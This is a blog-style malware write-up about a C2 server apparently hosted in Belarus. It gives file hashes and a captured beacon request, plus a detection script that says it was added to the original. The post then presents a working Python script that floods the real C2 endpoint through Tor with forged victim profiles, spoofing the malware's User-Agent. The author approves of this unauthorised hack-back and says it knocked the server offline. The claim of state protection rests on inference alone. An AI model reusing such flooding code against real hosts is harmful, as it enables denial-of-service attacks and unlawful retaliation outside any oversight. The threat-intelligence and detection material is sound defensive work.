How I Stumbled Upon the Malware

While reviewing new servers listed in the intel.nuffsec.com database, one entry immediately caught my attention: it was the first Belarusian🥔 server to appear in the database. Curious, I decided to dig deeper. My investigation revealed an open directory on port 12455 containing numerous files that were blatantly malicious.

Malware distribution

I downloaded all the files, promptly filed an abuse report and notified the Belarusian authorities, hoping for swift action. Days turned into weeks, and despite repeated reports from me and my colleagues, the server remained operational. This persistence led me to a troubling conclusion: either this server operates under the protection of the Belarusian government or its activities are being carried out with their tacit approval.

Such behavior in cyberspace is unacceptable. Faced with inaction, we resolved to take matters into our own hands and explore ways to disrupt their criminal activities.

Triaging the Threat

The first file I chose to analyze was “windows.exe”, with a SHA256 hash of: 71753ecf59a77395e89a84750dfe589d2bca15511105b79139777bbeacc4d916.

Thanks to the generous access provided by our friends at Recorded Future to their tria.ge platform, I was quickly able to uncover the file’s behavior. Here’s what stood out:

  1. Disabling security protections: The file actively attempts to neutralize antivirus and other defensive measures.
  2. Memory injection: It uses reflective techniques to inject itself directly into memory, avoiding detection by traditional scanning methods.
  3. Payload delivery: It connects to a remote Command-and-Control (C2) server to download and execute additional payloads or configuration files.

Further analysis revealed that another of the files, dialer.exe, sends JSON data to the same server, specifically to the C2 endpoint http://178.124.176.209/api/endpoint.php. The captured check-in looked like this:

POST /api/endpoint.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 466
Content-Type: application/json
Host: 178.124.176.209
User-Agent: cpp-httplib/0.12.6

{"id":"qdrbsaljdwvfwdgp", "computername":"UTKBEBLO", "username":"SYSTEM", "gpu":"Microsoft Basic Display Adapter", ...}

The payload contained detailed information about the infected machine, including its hardware specifications, the account name the sample runs under, and more. The C2 server responds with a simple {"response":"ok"}.
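The check-in above is a useful detection opportunity, because the path, the cpp-httplib User-Agent and the JSON profile fields are all stable across infections. The following script is an added example, not code from the post or from the malware authors: it parses a raw HTTP request as a proxy or sensor would capture it and grades it against those indicators. The sample body is constructed from the four fields visible in the capture (the rest was elided), the 16-character lowercase-alphanumeric "id" pattern is an assumption drawn from that single sample and from the flooding script's generator, and the curl/example.org requests are constructed negatives.

```python
import json
import re

# Indicators taken from the captured request shown in the post.
C2_HOST = "178.124.176.209"
C2_PATH = "/api/endpoint.php"
C2_USER_AGENT = "cpp-httplib/0.12.6"
# Fields visible in the captured JSON body; the rest of the body was elided in the capture.
PROFILE_FIELDS = {"id", "computername", "username", "gpu"}
# Assumption: the "id" is 16 lowercase alphanumerics, inferred from the one sample
# (qdrbsaljdwvfwdgp) and from the id generator in the flooding script.
ID_PATTERN = re.compile(r"[a-z0-9]{16}")


def build_request(path, host, user_agent, body):
    """Assemble a raw HTTP/1.1 POST in the header order cpp-httplib emitted (constructed data)."""
    return (
        f"POST {path} HTTP/1.1\r\n"
        "Accept: */*\r\n"
        "Connection: close\r\n"
        f"Content-Length: {len(body.encode())}\r\n"
        "Content-Type: application/json\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {user_agent}\r\n"
        "\r\n"
        f"{body}"
    )


def parse_http_request(raw):
    """Split a raw request into (method, path, headers, body); header names are lower-cased."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify_request(raw):
    """Return (label, reasons): 'beacon' for a full profile check-in, 'c2-contact' for
    any other traffic to the known C2 host, 'benign' otherwise."""
    method, path, headers, body = parse_http_request(raw)
    reasons = []
    if method == "POST" and path == C2_PATH:
        reasons.append("path")
    if headers.get("user-agent") == C2_USER_AGENT:
        reasons.append("user-agent")
    if headers.get("host") == C2_HOST:
        reasons.append("host")
    try:
        data = json.loads(body) if body else None
    except ValueError:
        data = None  # not JSON, so it cannot be the profile check-in
    if isinstance(data, dict) and PROFILE_FIELDS.issubset(data):
        reasons.append("profile-fields")
        if isinstance(data["id"], str) and ID_PATTERN.fullmatch(data["id"]):
            reasons.append("id-format")
    if "path" in reasons and "profile-fields" in reasons:
        label = "beacon"
    elif "host" in reasons:
        label = "c2-contact"
    else:
        label = "benign"
    return label, reasons


# Constructed samples: the check-in as captured (body completed with the four visible fields),
# a non-profile request to the C2 host, and an unrelated request to another host.
CHECKIN_SAMPLE = build_request(C2_PATH, C2_HOST, C2_USER_AGENT, json.dumps({
    "id": "qdrbsaljdwvfwdgp", "computername": "UTKBEBLO",
    "username": "SYSTEM", "gpu": "Microsoft Basic Display Adapter"}))
C2_OTHER_SAMPLE = build_request("/api/endpoint.php", C2_HOST, "curl/8.0", "id=1&foo=bar")
BENIGN_SAMPLE = build_request("/api/login", "example.org", "Mozilla/5.0", json.dumps({"user": "a"}))

if __name__ == "__main__":
    for name, sample in [("checkin", CHECKIN_SAMPLE), ("c2-other", C2_OTHER_SAMPLE), ("benign", BENIGN_SAMPLE)]:
        print(name, classify_request(sample))
```

The two-tier label matters in practice: the profile fields identify the implant even if it is re-pointed at a new host, while any contact with the known IP is worth alerting on regardless of what is posted, so neither indicator should be required on its own.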

Initially, I tried hunting for vulnerabilities on this IP or within the server itself. After countless hours of fuzzing and probing without much success, I decided to step back and rethink my approach. That’s when it hit me—the JSON data being sent by dialer.exe is likely being stored in their database.

I decided to try and disrupt their operation by overwhelming their database. Leveraging the known endpoint, I automated the submission of random machine profiles to flood their database with junk data.

I wrote a series of functions that generate the values I need (which we will leave out of the picture) and, using Tor as a proxy, I started filling their database:

import random
import string
import time

import requests


def generate_unique_id():
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=16))

def generate_unique_computername():
    return ''.join(random.choices(string.ascii_uppercase, k=8))

# Minimal placeholder versions of the value generators left out of the post,
# added so the script runs as shown; the real ones produce more varied data.
def random_username():
    return random.choice(["SYSTEM", "Administrator", "user"])

def random_gpu():
    return random.choice(["Microsoft Basic Display Adapter", "NVIDIA GeForce GTX 1650", "Intel(R) UHD Graphics 630"])

def random_cpu():
    return random.choice(["Intel(R) Core(TM) i5-8250U", "AMD Ryzen 5 3600", "Intel(R) Xeon(R) E5-2620"])

def random_active_window():
    return random.choice(["Program Manager", "Untitled - Notepad", "Google Chrome"])


url = "http://178.124.176.209/api/endpoint.php"
# Mimic the real client so the submissions are indistinguishable from dialer.exe check-ins.
headers = {
    "Content-Type": "application/json",
    "User-Agent": "cpp-httplib/0.12.6"
}


# socks5h so DNS resolution also happens inside Tor.
proxies = {
    "http": "socks5h://127.0.0.1:9050",
    "https": "socks5h://127.0.0.1:9050",
}

for i in range(10000000000000):
    # Fake machine profile mirroring the fields dialer.exe reports.
    payload = {
        "id": generate_unique_id(),
        "computername": generate_unique_computername(),
        "username": random_username(),
        "gpu": random_gpu(),
        "cpu": random_cpu(),
        "remoteconfig": "https://pastebin.com/raw/FphE0Qzc",
        "version": "3.4.1",
        "activewindow": random_active_window(),
        "runtime": random.randint(1, 10),
        "type": "xmrig",
        "pool": "ghostrider.unmineable.com",
        "port": 443,
        "algo": "ghostrider",
        "worker": "",
        "password": "x",
        "user": "USDT:TERWWhFtqzaNEsUkj7LApD8nGZ7X56qPNq.slit#t0m0-qtlf",
        "hashrate": round(random.uniform(0, 100), 2),
        "status": 6
    }

    # Tor circuits drop regularly; a failed request should not end the run.
    try:
        response = requests.post(url, headers=headers, json=payload, proxies=proxies, timeout=30)
        if response.status_code == 200:
            print(f"Request {i+1} success")
        else:
            print(f"Error request {i+1}: {response.status_code}")
    except requests.RequestException as exc:
        print(f"Request {i+1} failed: {exc}")

    time.sleep(0.1337)

All of this resulted in the server currently being unavailable. We continue to explore cyberspace in order to discover new copies of it and create more obstacles for cybercriminals.

Final Thoughts

Malware analysis is not just about understanding the threat; it’s about finding ways to protect others and fight back against bad actors. In this case, taking proactive steps against the C2 server not only disrupted their operation but also highlighted the importance of community vigilance in cybersecurity.